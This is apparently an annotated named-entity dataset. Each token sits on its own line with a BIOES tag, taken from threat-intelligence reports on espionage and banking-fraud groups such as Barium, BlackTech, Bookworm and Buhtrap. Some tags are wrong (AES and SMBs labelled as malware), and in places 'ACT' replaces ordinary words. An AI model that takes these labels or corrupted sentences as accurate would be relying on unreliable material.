O + +Using O +the O +information O +gathered O +from O +its O +reconnaissance O +on O +social B-IDTY +media E-IDTY +sites O +, O +Barium S-APT +packages O +the O +phishing B-ACT +e-mail E-ACT +in O +a O +ACT O +that O +gives O +the O +e-mail S-TOOL +credibility O +to O +the O +target O +user O +, O +often O +by O +making O +the O +e-mail S-TOOL +appear O +as O +ifit O +were O +sent O +from O +an O +organization O +known O +to O +and O +trusted O +by O +the O +victim O +or O +concerning O +a O +topic O +of O +interest O +to O +the O +victim O +. O + +Barium S-APT +Defendants O +install O +the O +malicious O +" O +Win32/Barlaiy S-MAL +" O +malware O +and O +the O +malicious O +" O +Win32/PlugX.L S-MAL +" O +malware O +on O +victim O +computers O +using O +the O +means O +described O +above O +. O + +Both O +Win32/Barlaiy S-MAL +& O +Win32/PlugX.L S-MAL +are O +remote O +access O +" O +trojans O +" O +, O +which O +allow O +Barium S-APT +to O +gather O +a O +victim O +'s O +information O +, O +control O +a O +victim O +'s O +device O +, O +install O +additional O +malware O +, O +and O +exfiltrate O +information O +fi-om O +a O +victim O +'s O +device O +. O + +Barium S-APT +Defendants O +install O +the O +malicious O +credential O +stealing O +and O +injection O +tool O +known O +as O +" O +Win32/RibDoor.A!dha S-MAL +" O +. O + +While O +not O +detected O +at O +the O +time O +, O +Microsoft S-IDTY +'s O +antivirus O +and O +security O +products O +now O +detect O +this O +Barium S-APT +malicious O +file O +and O +flag O +the O +file O +as O +" O +Win32/ShadowPad.A S-FILE +" O +. O + +MXI B-FILE +Player E-FILE +appears O +to O +be O +a O +version O +of O +the O +Bahamut O +agent O +, O +designed O +to O +record O +the O +phone O +calls O +and O +collect O +other O +information O +about O +the O +user O +( O +com.mxi.videoplay S-DOM +) O +. 
O + +Figure O +9a O +, O +below O +, O +shows O +detections O +of O +encounters O +with O +the O +Barium S-APT +actors O +and O +their O +infrastructure O +, O +including O +infected O +computers O +located O +in O +Virginia S-LOC +, O +and O +Figure O +9b O +, O +below O +, O +shows O +detections O +of O +encounters O +throughout O +the O +United B-LOC +States E-LOC +. O + +Barium S-APT +has O +targeted O +Microsoft B-IDTY +customers E-IDTY +both O +in O +Virginia S-LOC +, O +the O +United B-LOC +States E-LOC +, O +and O +around O +the O +world O +. O + +Once O +the O +Barium S-APT +Defendants O +have O +access O +to O +a O +victim O +computer O +through O +the O +malware O +described O +above O +, O +they O +monitor O +the O +victim O +'s O +activity O +and O +ultimately O +search O +for O +and O +steal O +sensitive O +documents O +( O +for O +example O +, O +Exfiltration S-ACT +of O +intellectual O +property O +regarding O +technology S-IDTY +has O +been O +seen O +) O +, O +and O +personal O +information O +from O +the O +victim O +'s O +network O +. O + +According O +to O +a O +49-page O +report O +published O +Thursday O +, O +all O +of O +the O +attacks O +are O +the O +work O +of O +the O +Chinese B-IDTY +government I-IDTY +'s I-IDTY +intelligence I-IDTY +apparatus E-IDTY +, O +which O +the O +report O +'s O +authors O +dub O +the O +Winnti B-APT +Umbrella E-APT +. O + +Researchers O +from O +various O +security O +organizations O +have O +used O +a O +variety O +of O +names O +to O +assign O +responsibility O +for O +the O +hacks O +, O +including O +LEAD S-APT +, O +BARIUM S-APT +, O +Wicked B-APT +Panda E-APT +, O +GREF S-APT +, O +PassCV S-APT +, O +Axiom S-APT +, O +and O +Winnti S-APT +. 
O + +It O +targets O +organizations O +in O +Japan S-LOC +, O +South B-LOC +Korea E-LOC +, O +and O +Taiwan S-LOC +, O +leveling O +its O +attacks O +on O +public B-IDTY +sector I-IDTY +agencies E-IDTY +and O +telecommunications S-IDTY +and O +other O +high-technology B-IDTY +industries E-IDTY +. O + +In O +2016 S-TIME +, O +for O +instance O +, O +we O +found O +their O +campaigns S-ACT +attacking O +Japanese S-LOC +organizations O +with O +various O +malware O +tools O +, O +notably O +the O +Elirks B-MAL +backdoor E-MAL +. O + +Blackgear O +has O +been O +targeting O +various O +industries O +since O +its O +emergence O +a O +decade O +ago O +. O + +Blackgear O +'s O +campaigns S-ACT +also O +use O +email S-TOOL +as O +an O +entry O +point O +, O +which O +is O +why O +it's O +important O +to O +secure O +the O +email B-TOOL +gateway E-TOOL +. O + +BLACKGEAR S-ACT +is O +an O +espionage B-ACT +campaign E-ACT +which O +has O +targeted O +users S-IDTY +in O +Taiwan S-LOC +for O +many O +years O +. O + +Our O +research O +indicates O +that O +it O +has O +started O +targeting O +Japanese B-IDTY +users E-IDTY +. O + +The O +malware O +tools O +used O +by O +BLACKGEAR S-ACT +can O +be O +categorized O +into O +three O +categories O +: O +binders S-MAL +, O +downloaders S-MAL +and O +backdoors S-MAL +. O + +Binders S-MAL +are O +delivered O +by O +attack O +vectors O +( O +such O +as O +phishing S-ACT +and O +watering B-ACT +hole I-ACT +attacks E-ACT +) O +onto O +a O +machine O +. O + +Based O +on O +the O +mutexes O +and O +domain O +names O +of O +some O +of O +their O +C&C S-TOOL +servers O +, O +BlackTech O +'s O +campaigns S-ACT +are O +likely O +designed O +to O +steal O +their O +target O +'s O +technology O +. 
O + +Following O +their O +activities S-ACT +and O +evolving O +tactics O +and O +techniques O +helped O +us O +uncover O +the O +proverbial O +red O +string O +of O +fate O +that O +connected O +three O +seemingly O +disparate O +campaigns S-ACT +: O +PLEAD S-ACT +, O +Shrouded B-ACT +Crossbow E-ACT +, O +and O +of O +late O +, O +Waterbear S-ACT +. O + +Active O +since O +2012 S-TIME +, O +it O +has O +so O +far O +targeted O +Taiwanese O +government B-IDTY +agencies E-IDTY +and O +private O +organizations O +. O + +PLEAD S-ACT +uses O +spear-phishing S-ACT +emails S-TOOL +to O +deliver O +and O +install O +their O +backdoor O +, O +either O +as O +an O +attachment O +or O +through O +links O +to O +cloud B-MAL +storage I-MAL +services E-MAL +. O + +PLEAD S-ACT +also O +dabbled O +with O +a O +short-lived O +, O +fileless O +version O +of O +their O +malware O +when O +it O +obtained O +an O +exploit S-VULNAME +for O +a O +Flash S-TOOL +vulnerability O +( O +CVE-2015-5119 S-VULID +) O +that O +was O +leaked O +during O +the O +Hacking O +Team O +breach O +. O + +PLEAD S-ACT +also O +uses O +CVE-2017-7269 S-VULID +, O +a O +buffer O +overflow O +vulnerability O +Microsoft S-IDTY +Internet B-TOOL +Information I-TOOL +Services E-TOOL +( O +IIS S-TOOL +) O +6.0 O +to O +compromise O +the O +victim O +'s O +server O +. O + +This O +campaign O +, O +first O +observed O +in O +2010 S-TIME +, O +is O +believed O +to O +be O +operated O +by O +a O +well-funded O +group O +given O +how O +it O +appeared O +to O +have O +purchased O +the O +source O +code O +of O +the O +BIFROST O +backdoor O +, O +which O +the O +operators O +enhanced O +and O +created O +other O +tools O +from O +. 
O + +Shrouded B-ACT +Crossbow E-ACT +targeted O +privatized B-IDTY +agencies E-IDTY +and O +government B-IDTY +contractors E-IDTY +as O +well O +as O +enterprises S-IDTY +in O +the O +consumer B-IDTY +electronics E-IDTY +, O +computer S-IDTY +, O +healthcare S-IDTY +, O +and O +financial B-IDTY +industries E-IDTY +. O + +Shrouded B-ACT +Crossbow E-ACT +employs O +three O +BIFROST-derived B-MAL +backdoors E-MAL +: O +BIFROSE S-MAL +, O +KIVARS S-MAL +, O +and O +XBOW S-MAL +. O + +Like O +PLEAD S-ACT +, O +Shrouded B-ACT +Crossbow E-ACT +uses O +spear-phishing S-ACT +emails S-TOOL +with O +backdoor-laden O +attachments O +that O +utilize O +the O +RTLO B-MAL +technique E-MAL +and O +accompanied O +by O +decoy B-FILE +documents E-FILE +. O + +XBOW S-MAL +'s O +capabilities O +are O +derived O +from O +BIFROSE S-MAL +and O +KIVARS S-MAL +; O +Shrouded B-ACT +Crossbow E-ACT +gets O +its O +name O +from O +its O +unique O +mutex O +format O +. O + +While O +PLEAD S-MAL +and O +KIVARS S-MAL +are O +most O +likely O +to O +be O +used O +in O +first O +phase O +attacks O +, O +Waterbear S-ACT +can O +be O +seen O +as O +a O +secondary O +backdoor O +installed O +after O +attackers O +have O +gained O +a O +certain O +level O +of O +privilege O +. O + +Recently O +, O +the O +JPCERT S-SECTEAM +published O +a O +thorough O +analysis O +of O +the O +Plead B-MAL +backdoor E-MAL +, O +which O +, O +according O +to O +Trend B-SECTEAM +Micro E-SECTEAM +, O +is O +used O +by O +the O +cyberespionage O +group O +BlackTech O +. O + +Despite O +the O +fact O +that O +the O +Changing B-LOC +Information I-LOC +Technology I-LOC +Inc. E-LOC +certificate O +was O +revoked O +on O +July B-TIME +4 E-TIME +, O +2017 S-TIME +, O +the O +BlackTech O +group O +is O +still O +using O +it O +to O +sign O +their O +malicious O +tools O +. O + +The O +BlackTech O +group O +is O +primarily O +focused O +on O +cyberespionage O +in O +Asia S-LOC +. 
O + +The O +new O +activity O +described O +in O +this O +blogpost O +was O +detected O +by O +ESET S-SECTEAM +in O +Taiwan S-LOC +, O +where O +the O +Plead S-MAL +malware S-MAL +has O +always O +been O +most O +actively O +deployed O +. O + +Attackers O +are O +targeting O +the O +Windows S-OS +platform O +and O +aiming O +at O +government B-IDTY +institutions E-IDTY +as O +well O +as O +big O +companies O +in O +Colombia S-LOC +. O + +Attackers O +like O +to O +use O +spear-phishing B-ACT +email E-ACT +with O +a O +password O +protected O +RAR S-FILE +attachment O +to O +avoid O +being O +detected O +by O +the O +email B-TOOL +gateway E-TOOL +. O + +The O +first O +sample O +being O +captured O +was O +in O +April B-TIME +2018 E-TIME +and O +since O +then O +we O +have O +observed O +a O +lot O +more O +related O +ones O +. O + +After O +performing O +investigations O +on O +the O +classified O +victims O +, O +we O +find O +the O +attacker O +targets O +big O +companies O +and O +government B-IDTY +agencies E-IDTY +in O +Colombia S-LOC +. O + +After O +monitoring O +and O +correlating O +the O +APT B-ACT +attack E-ACT +, O +360 B-SECTEAM +Threat I-SECTEAM +Intelligence I-SECTEAM +Center E-SECTEAM +discovered O +multiple O +related O +emails S-TOOL +to O +attack O +Colombian S-LOC +government B-IDTY +agencies E-IDTY +, O +financial B-IDTY +institutions E-IDTY +and O +large O +enterprises S-IDTY +. O + +The O +oldest O +sample O +we've O +seen O +up O +to O +now O +is O +from O +November B-TIME +2013 E-TIME +. O + +One O +of O +the O +top O +targets O +is O +the O +Japan S-LOC +Pension B-IDTY +Service E-IDTY +, O +but O +the O +list O +of O +targeted O +industries O +includes O +government S-IDTY +and O +government B-IDTY +agencies E-IDTY +, O +local B-IDTY +governments E-IDTY +, O +public B-IDTY +interest I-IDTY +groups E-IDTY +, O +universities S-IDTY +, O +banks S-IDTY +, O +financial B-IDTY +services E-IDTY +, O +energy S-IDTY +and O +so O +on O +. 
O + +However O +, O +the O +attack O +is O +different O +in O +two O +respects O +: O +unlike O +other O +APTs O +, O +the O +main O +focus O +of O +Blue B-MAL +Termite E-MAL +is O +to O +attack O +Japanese S-LOC +organizations O +; O +and O +most O +of O +their O +C2s O +are O +located O +in O +Japan S-LOC +. O + +Originally O +, O +the O +main O +infection O +vector O +of O +Blue B-MAL +Termite E-MAL +was O +spear-phishing S-ACT +emails S-TOOL +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +has O +detected O +a O +new O +method O +of O +first O +infection O +that O +uses O +a O +drive-by-download O +with O +a O +flash S-TOOL +exploit S-VULNAME +( O +CVE-2015-5119 S-VULID +, O +the O +one O +leaked O +from O +The O +Hacking O +Team O +incident O +) O +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +also O +found O +some O +watering B-ACT +hole I-ACT +attacks E-ACT +, O +including O +one O +on O +a O +website O +belonging O +to O +a O +prominent O +member O +of O +the O +Japanese B-LOC +government E-LOC +. O + +In O +early O +July B-TIME +2015 E-TIME +, O +however O +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +found O +a O +sample O +that O +creates O +a O +decryption O +key O +with O +Salt1 O +, O +Salt2 O +, O +and O +Salt3 O +. O + +From O +early O +June S-TIME +, O +when O +the O +cyber-attack O +on O +the O +Japan S-LOC +Pension B-IDTY +Service E-IDTY +started O +to O +be O +reported O +widely O +, O +various O +Japanese S-LOC +organizations O +would O +have O +started O +to O +deploy O +protection O +measures O +. O + +It O +employs O +AES S-MAL +in O +addition O +to O +SID S-MAL +tricks O +, O +making O +it O +difficult O +to O +decrypt O +sensitive O +data O +. O + +In O +order O +to O +fight O +back O +against O +this O +cyber-espionage O +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +will O +continue O +its O +research O +. 
O + +Bookworm S-MAL +'s O +functional O +code O +is O +radically O +different O +from O +PlugX S-MAL +and O +has O +a O +rather O +unique O +modular O +architecture O +that O +warranted O +additional O +analysis O +by O +Unit B-SECTEAM +42 E-SECTEAM +. O + +Bookworm S-MAL +has O +little O +malicious O +functionality O +built-in O +, O +with O +its O +only O +core O +ability O +involving O +stealing O +keystrokes O +and O +clipboard O +contents O +. O + +The O +Plead S-MAL +malware S-MAL +is O +a O +backdoor S-MAL +which O +, O +according O +to O +Trend B-SECTEAM +Micro E-SECTEAM +, O +is O +used O +by O +the O +BlackTech O +group O +in O +targeted B-ACT +attacks E-ACT +. O + +So O +far O +, O +it O +appears O +threat O +actors O +have O +deployed O +the O +Bookworm B-MAL +Trojan E-MAL +primarily O +in O +attacks O +on O +targets O +in O +Thailand S-LOC +. O + +The O +threat O +actors O +use O +a O +commercial O +installation O +tool O +called O +Smart B-TOOL +Installer I-TOOL +Maker E-TOOL +to O +encapsulate O +and O +execute O +a O +self-extracting B-MAL +RAR E-MAL +archive O +and O +in O +some O +cases O +a O +decoy B-MAL +slideshow E-MAL +or O +Flash B-MAL +installation I-MAL +application E-MAL +. O + +The O +self-extracting B-MAL +RAR E-MAL +writes O +a O +legitimate O +executable O +, O +an O +actor-created O +DLL S-TOOL +called O +Loader.dll S-FILE +and O +a O +file O +named O +readme.txt S-FILE +to O +the O +filesystem O +and O +then O +executes O +the O +legitimate O +executable O +. O + +Using O +XREFs O +during O +static O +analysis O +is O +a O +common O +technique O +to O +quickly O +find O +where O +functions O +of O +interest O +are O +called O +. 
O + +The O +developers O +designed O +Bookworm S-MAL +to O +be O +a O +modular B-MAL +Trojan E-MAL +not O +limited O +to O +just O +the O +initial O +architecture O +of O +the O +Trojan S-MAL +, O +as O +Bookworm S-MAL +can O +also O +load O +additional O +modules O +provided O +by O +the O +C2 S-TOOL +server O +. O + +Although O +the O +developers O +of O +Bookworm S-MAL +have O +included O +only O +keylogging O +functionality O +in O +Bookworm S-MAL +as O +a O +core O +ability O +, O +as O +suggested O +in O +Table O +1 O +, O +several O +of O +the O +embedded O +DLLs O +provide O +Leader O +with O +cryptographic O +and O +hashing O +functions O +, O +while O +others O +support O +Leader S-MAL +'s O +ability O +to O +communicate O +with O +its O +C2 S-TOOL +server O +. O + +While O +we O +did O +not O +discuss O +the O +surrounding B-ACT +attacks E-ACT +using O +Bookworm S-MAL +in O +detail O +, O +we O +have O +observed O +threat O +actors O +deploying O +Bookworm S-MAL +primarily O +in O +attacks O +on O +targets O +in O +Thailand S-LOC +. O + +Also O +, O +Bookworm S-MAL +uses O +a O +combination O +of O +encryption O +and O +compression O +algorithms O +to O +obfuscate O +the O +traffic O +between O +the O +system O +and O +C2 S-TOOL +server O +. O + +The O +developers O +of O +Bookworm S-MAL +have O +gone O +to O +great O +lengths O +to O +create O +a O +modular O +framework O +that O +is O +very O +flexible O +through O +its O +ability O +to O +run O +additional O +modules O +directly O +from O +its O +C2 S-TOOL +server O +. O + +Unit B-SECTEAM +42 E-SECTEAM +recently O +published O +a O +blog O +on O +a O +newly O +identified O +Trojan S-MAL +called O +Bookworm S-MAL +, O +which O +discussed O +the O +architecture O +and O +capabilities O +of O +the O +malware O +and O +alluded O +to O +Thailand S-LOC +being O +the O +focus O +of O +the O +threat O +actors' O +campaigns S-ACT +. 
O + +Leader S-MAL +is O +Bookworm S-MAL +'s O +main O +module O +and O +controls O +all O +of O +the O +activities S-ACT +of O +the O +Trojan S-MAL +, O +but O +relies O +on O +the O +additional O +DLLs S-FILE +to O +provide O +specific O +functionality O +. O + +The O +developers O +of O +Bookworm S-MAL +use O +these O +modules O +in O +a O +rather O +unique O +way O +, O +as O +the O +other O +embedded O +DLLs O +provide O +API O +functions O +for O +Leader S-MAL +to O +carry O +out O +its O +tasks O +. O + +Unit B-SECTEAM +42 E-SECTEAM +does O +not O +have O +detailed O +targeting O +information O +for O +all O +known O +Bookworm B-MAL +samples E-MAL +, O +but O +we O +are O +aware O +of O +attempted O +attacks O +on O +at O +least O +two O +branches O +of O +government S-IDTY +in O +Thailand S-LOC +. O + +We O +speculate O +that O +other O +attacks O +delivering O +Bookworm S-MAL +were O +also O +targeting O +organizations O +in O +Thailand S-LOC +based O +on O +the O +contents O +of O +the O +associated O +decoy B-FILE +documents E-FILE +, O +as O +well O +as O +several O +of O +the O +dynamic B-MAL +DNS I-MAL +domain E-MAL +names O +used O +to O +host O +C2 S-TOOL +servers O +that O +contain O +the O +words O +" O +Thai S-LOC +" O +or O +" O +Thailand S-LOC +" O +. O + +We O +believe O +that O +it O +is O +likely O +threat O +actors O +will O +continue O +development O +of O +Bookworm S-MAL +, O +and O +will O +continue O +to O +use O +it O +for O +the O +foreseeable O +future O +. O + +Threat O +actors O +have O +delivered O +Bookworm S-MAL +as O +a O +payload O +in O +attacks O +on O +targets O +in O +Thailand S-LOC +. O + +Analysis O +of O +compromised O +systems O +seen O +communicating O +with O +Bookworm B-MAL +C2 I-MAL +servers E-MAL +also O +confirms O +our O +speculation O +on O +targeting O +with O +a O +majority O +of O +systems O +existing O +within O +Thailand S-LOC +. 
O + +As O +mentioned O +in O +our O +previous O +blog O +on O +Bookworm S-MAL +, O +the O +Trojan S-MAL +sends O +a O +static O +date O +string O +to O +the O +C2 S-TOOL +server O +that O +we O +referred O +to O +as O +a O +campaign O +code O +. O + +We O +believed O +that O +the O +actors O +would O +use O +this O +date B-MAL +code E-MAL +to O +track O +their O +attack B-ACT +campaigns E-ACT +; O +however O +, O +after O +continued O +analysis O +of O +the O +malware O +, O +we O +think O +these O +static O +dates O +could O +also O +be O +a O +build O +identifier O +for O +the O +Trojan S-MAL +. O + +Threat O +actors O +may O +use O +the O +date B-FILE +string I-FILE +hardcoded E-FILE +into O +each O +Bookworm B-MAL +sample E-MAL +as O +a O +build O +identifier O +. O + +A O +Trojan S-MAL +sending O +a O +build O +identifier O +to O +its O +C2 S-TOOL +server O +is O +quite O +common O +, O +as O +it O +notifies O +the O +threat O +actors O +of O +the O +specific O +version O +of O +the O +Trojan S-MAL +in O +which O +they O +are O +interacting O +. O + +Due O +to O +these O +changes O +without O +a O +new O +date B-FILE +string E-FILE +, O +we O +believe O +the O +date B-FILE +codes E-FILE +are O +used O +for O +campaign O +tracking O +rather O +than O +a O +Bookworm S-MAL +build O +identifier O +. O + +We O +believe O +that O +Bookworm B-MAL +samples E-MAL +use O +the O +static O +date O +string O +as O +campaign O +codes O +, O +which O +we O +used O +to O +determine O +the O +approximate O +date O +of O +each O +attack O +that O +we O +did O +not O +have O +detailed O +targeting O +information O +. O + +Another O +decoy B-FILE +slideshow E-FILE +associated O +with O +the O +Bookworm B-ACT +attack I-ACT +campaign E-ACT +contains O +photos O +of O +an O +event O +called O +Bike O +for O +Dad O +2015 S-TIME +. 
O + +The O +campaign O +code O +" O +20150920 O +" O +is O +associated O +with O +this O +decoy O +, O +which O +is O +a O +week O +prior O +to O +media S-IDTY +articles O +announcing O +that O +the O +Crown O +Prince O +of O +Thailand S-LOC +Maha O +Vajiralongkorn O +will O +lead O +the O +Bike O +for O +Dad O +2015 S-TIME +event O +. O + +Chitpas O +is O +heavily O +involved O +with O +Thailand S-LOC +politics S-IDTY +and O +was O +a O +core O +leader O +of O +the O +People B-IDTY +'s I-IDTY +Committee I-IDTY +for I-IDTY +Absolute I-IDTY +Democracy E-IDTY +( O +PCAD S-IDTY +) O +, O +which O +is O +an O +organization O +that O +staged O +anti-government B-ACT +campaigns E-ACT +in O +2013 S-TIME +and O +2014 S-TIME +. O + +The O +final O +remaining O +known O +decoy S-FILE +includes O +photos O +of O +Chitpas O +Tant O +Kridakon O +( O +Figure O +7 O +) O +, O +who O +is O +known O +as O +heiress O +to O +the O +largest O +brewery O +in O +Thailand S-LOC +. O + +These O +images O +were O +associated O +with O +the O +Bookworm B-ACT +campaign E-ACT +code O +" O +20150905 O +" O +. O + +Unit B-SECTEAM +42 E-SECTEAM +analyzed O +the O +systems O +communicating O +with O +the O +Bookworm S-MAL +C2 S-TOOL +domains O +and O +found O +that O +a O +majority O +of O +the O +IP S-PROT +addresses O +existed O +within O +autonomous O +systems O +located O +in O +Thailand S-LOC +. O + +The O +pie O +chart O +in O +Figure O +8 O +shows O +that O +the O +vast O +majority O +( O +73% O +) O +of O +the O +hosts O +are O +geographically O +located O +in O +Thailand S-LOC +, O +which O +matches O +the O +known O +targeting O +of O +this O +threat O +group O +. O + +We O +believe O +that O +the O +IP S-PROT +addresses O +from O +Canada S-LOC +, O +Russia S-LOC +and O +Norway S-LOC +are O +analysis O +systems O +of O +antivirus B-IDTY +companies E-IDTY +or O +security O +researchers O +. 
O + +Overall O +, O +the O +Bookworm S-MAL +infrastructure O +overlaps O +with O +the O +infrastructure O +hosting O +C2 S-TOOL +servers O +used O +by O +various O +attack O +tools O +, O +including O +FFRAT S-MAL +, O +Poison B-MAL +Ivy E-MAL +, O +PlugX S-MAL +, O +and O +others O +. O + +Unit B-SECTEAM +42 E-SECTEAM +enumerated O +the O +threat O +infrastructure O +related O +to O +Bookworm S-MAL +and O +created O +a O +chart O +to O +visualize O +connected O +entities O +to O +its O +current O +attack B-ACT +campaign E-ACT +. O + +Threat O +actors O +have O +targeted O +the O +government S-IDTY +of O +Thailand S-LOC +and O +delivered O +the O +newly O +discovered O +Bookworm B-MAL +Trojan E-MAL +since O +July B-TIME +2015 E-TIME +. O + +The O +actors O +appear O +to O +follow O +a O +set O +playbook O +, O +as O +the O +observed O +TTPs O +are O +fairly O +static O +within O +each O +attack O +in O +this O +campaign O +. O + +So O +far O +, O +Unit B-SECTEAM +42 E-SECTEAM +has O +seen O +infrastructure O +overlaps O +with O +servers O +hosting O +C2 S-TOOL +servers O +for O +samples O +of O +the O +FFRAT S-MAL +, O +PlugX S-MAL +, O +Poison B-MAL +Ivy E-MAL +and O +Scieron B-MAL +Trojans E-MAL +, O +suggesting O +that O +the O +threat O +actors O +use O +these O +tools O +as O +the O +payload O +in O +their O +attacks O +. O + +The O +threat O +actors O +have O +continually O +used O +Flash B-MAL +Player I-MAL +installers E-MAL +and O +Flash B-MAL +slideshows E-MAL +for O +decoys O +. 
O + +The O +vast O +majority O +of O +systems O +communicating O +with O +Bookworm S-MAL +C2 S-TOOL +servers O +are O +within O +the O +Bangkok S-LOC +metropolitan O +area O +where O +a O +majority O +of O +the O +government S-IDTY +of O +Thailand S-LOC +exists O +. O + +Buhtrap S-APT +has O +been O +active O +since O +2014 S-TIME +, O +however O +their O +first O +attacks O +against O +financial B-IDTY +institutions E-IDTY +were O +only O +detected O +in O +August B-TIME +2015 E-TIME +. O + +At O +the O +moment O +, O +the O +group O +is O +known O +to O +target O +Russian S-LOC +and O +Ukrainian S-LOC +banks S-IDTY +. O + +Buhtrap S-APT +is O +the O +first O +hacker O +group O +using O +a O +network B-ACT +worm E-ACT +to O +infect O +the O +overall O +bank S-IDTY +infrastructure O +that O +significantly O +increases O +the O +difficulty O +of O +removing O +all O +malicious O +functions O +from O +the O +network O +. O + +Malicious O +programs O +intentionally O +scan O +for O +machines O +with O +an O +automated O +Bank-Customer O +system O +of O +the O +Central O +bank S-IDTY +of O +Russia S-LOC +( O +further O +referred O +to O +as O +BCS O +CBR O +) O +. O + +If O +the O +document O +was O +delivered O +with O +macros O +instead O +of O +exploits O +( O +CVE-2012-0158 S-VULID +, O +CVE-2013-3906 S-VULID +or O +CVE-2014-1761 S-VULID +) O +, O +then O +the O +document O +contained O +instructions O +for O +enabling O +macros O +. O + +We O +noticed O +that O +criminals O +were O +spreading O +Buhtrap S-APT +using O +this O +method O +from O +May B-TIME +2015 E-TIME +to O +August B-TIME +2015 E-TIME +. O + +It O +is O +worth O +noting O +that O +attackers O +used O +the O +same O +compromised B-MAL +websites E-MAL +to O +spread O +Buhtrap S-MAL +as O +those O +that O +had O +been O +used O +for O +the O +Corkow B-MAL +Trojan E-MAL +. 
O + +Moreover O +, O +they O +used O +the O +same O +exploit S-VULNAME +kit B-VULNAME +Niteris E-VULNAME +as O +that O +in O +the O +Corkow S-MAL +case O +. O + +Purportedly O +during O +one O +of O +the O +first O +attacks O +hackers O +intercepted O +the O +mailing O +list O +of O +the O +Anti-drop O +" O +club O +and O +created O +a O +specific O +phishing B-ACT +email E-ACT +for O +its O +members O +. O + +However O +, O +it O +is O +still O +widely O +used O +, O +notably O +in O +Russia S-LOC +. O + +As O +noted O +in O +our O +previous O +blog O +on O +Buhtrap O +, O +this O +gang O +has O +been O +actively O +targeting O +Russian O +businesses S-IDTY +, O +mostly O +through O +spear-phishing S-ACT +. O + +It O +is O +thus O +interesting O +to O +see O +Buhtrap O +add O +strategic B-ACT +web I-ACT +compromises E-ACT +to O +their O +arsenal O +. O + +The O +first O +malware O +we O +saw O +was O +the O +lurk B-MAL +downloader E-MAL +, O +which O +was O +distributed O +on O +October B-TIME +26th E-TIME +. O + +The O +executable O +would O +install O +the O +real O +Ammyy O +product O +, O +but O +would O +also O +launch O +a O +file O +called O +either O +AmmyyService.exe S-FILE +or O +AmmyySvc.exe S-FILE +which O +contained O +the O +malicious O +payload O +. O + +Buhtrap S-APT +is O +getting O +better O +at O +disguising O +the O +code O +they O +inject O +into O +compromised B-MAL +websites E-MAL +. O + +With O +the O +recent O +arrests O +of O +actors O +using O +the O +Lurk B-MAL +banking I-MAL +trojan E-MAL +, O +Buhtrap O +appears O +to O +be O +a O +likely O +alternative O +for O +actors O +wishing O +to O +target O +Russian S-LOC +banks S-IDTY +and O +software O +. O + +They O +have O +different O +functions O +and O +ACTs O +of O +spreading O +, O +but O +the O +same O +purpose O +— O +to O +steal O +money O +from O +the O +accounts O +of O +businesses S-IDTY +. 
O + +Our O +experts O +have O +found O +that O +cybercriminals O +are O +actively O +focusing O +on O +SMBs S-MAL +, O +and O +giving O +particular O +attention O +to O +accountants S-IDTY +. O + +The O +first O +encounter O +with O +Buhtrap O +was O +registered O +back O +in O +2014 S-TIME +. O + +For O +now O +, O +we O +can O +call O +RTM S-MAL +one O +of O +the O +most O +active O +financial S-IDTY +Trojans O +. O + +At O +that O +time O +it O +was O +the O +name O +of O +a O +cybercriminal O +group O +that O +was O +stealing O +money O +from O +Russian S-LOC +financial B-IDTY +establishments E-IDTY +— O +to O +the O +tune O +of O +at O +least O +$150,000 O +per O +hit O +. O + +Buhtrap O +resurfaced O +in O +the O +beginning O +of O +2017 S-TIME +in O +the O +TwoBee B-ACT +campaign E-ACT +, O +where O +it O +served O +primarily O +as O +means O +of O +malware O +delivery O +. O + +After O +the O +source O +codes O +of O +their O +tools O +became O +public O +in O +2016 S-TIME +, O +the O +name O +Buhtrap O +was O +used O +for O +the O +financial B-MAL +Trojan E-MAL +. O + +Just O +like O +last O +time O +, O +Buhtrap O +is O +spreading O +through O +exploits O +embedded O +in O +news B-IDTY +outlets E-IDTY +. O + +Estimating O +the O +damages O +is O +challenging O +, O +but O +as O +we O +learned O +, O +the O +criminals O +are O +siphoning O +off O +assets O +in O +transactions O +that O +do O +not O +exceed O +$15,000 O +each O +. O + +As O +explained O +later O +, O +we O +believe O +this O +campaign O +is O +financially-motivated O +and O +that O +it O +targets O +accounting B-IDTY +departments E-IDTY +in O +Russian O +businesses S-IDTY +. O + +" O +Buhgalter O +" O +means O +" O +accountant O +" O +in O +Russian S-LOC +. O + +Seeing O +a O +campaign O +like O +this O +, O +inevitably O +the O +Anunak/Carbanak S-MAL +documented O +by O +Fox-IT S-SECTEAM +and O +Kaspersky S-SECTEAM +comes O +to O +mind O +. 
O + +The O +infection O +vector O +is O +similar O +, O +it O +uses O +a O +similar O +modified O +mimikatz S-MAL +application O +, O +and O +it O +uses O +a O +third-party B-MAL +remote I-MAL +access I-MAL +tool E-MAL +, O +changes O +system O +settings O +to O +allow O +concurrent O +RDP S-MAL +sessions O +, O +and O +so O +on O +. O + +The O +second O +, O +aptly O +titled O +" O +kontrakt87.doc S-FILE +" O +, O +copies O +a O +generic O +telecommunications B-IDTY +service E-IDTY +contract O +from O +MegaFon S-IDTY +, O +a O +large O +Russian S-LOC +mobile B-IDTY +phone I-IDTY +operator E-IDTY +. O + +In O +addition O +to O +built-in O +functionalities O +, O +the O +operators O +of O +Careto S-FILE +can O +upload O +additional O +modules O +which O +can O +perform O +any O +malicious O +task O +. O + +Careto S-FILE +'s O +Mask B-ACT +campaign E-ACT +we O +discovered O +relies O +on O +spear-phishing S-ACT +e-mails E-ACT +with O +links O +to O +a O +malicious O +website O +. O + +Sometimes O +, O +the O +attackers O +use O +sub-domains S-MAL +on O +the O +exploit S-VULNAME +websites O +, O +to O +make O +them O +seem O +more O +legitimate O +. O + +These O +sub-domains O +simulate O +sub-sections O +of O +the O +main O +newspapers S-IDTY +in O +Spain S-LOC +plus O +some O +international O +ones O +like O +the O +Guardian O +and O +the O +Washington B-IDTY +Post E-IDTY +. O + +The O +CVE-2012-0773 S-VULID +was O +originally O +discovered O +by O +VUPEN O +and O +has O +an O +interesting O +story O +. O + +In O +other O +words O +, O +the O +attackers O +attracted O +our O +attention O +by O +attempting O +to O +exploit S-VULNAME +Kaspersky B-MAL +Lab I-MAL +products E-MAL +. O + +We O +initially O +became O +aware O +of O +Careto S-FILE +when O +we O +observed O +attempts O +to O +exploit S-VULNAME +a O +vulnerability O +in O +our O +products O +to O +make O +the O +malware O +" O +invisible O +" O +in O +the O +system O +. 
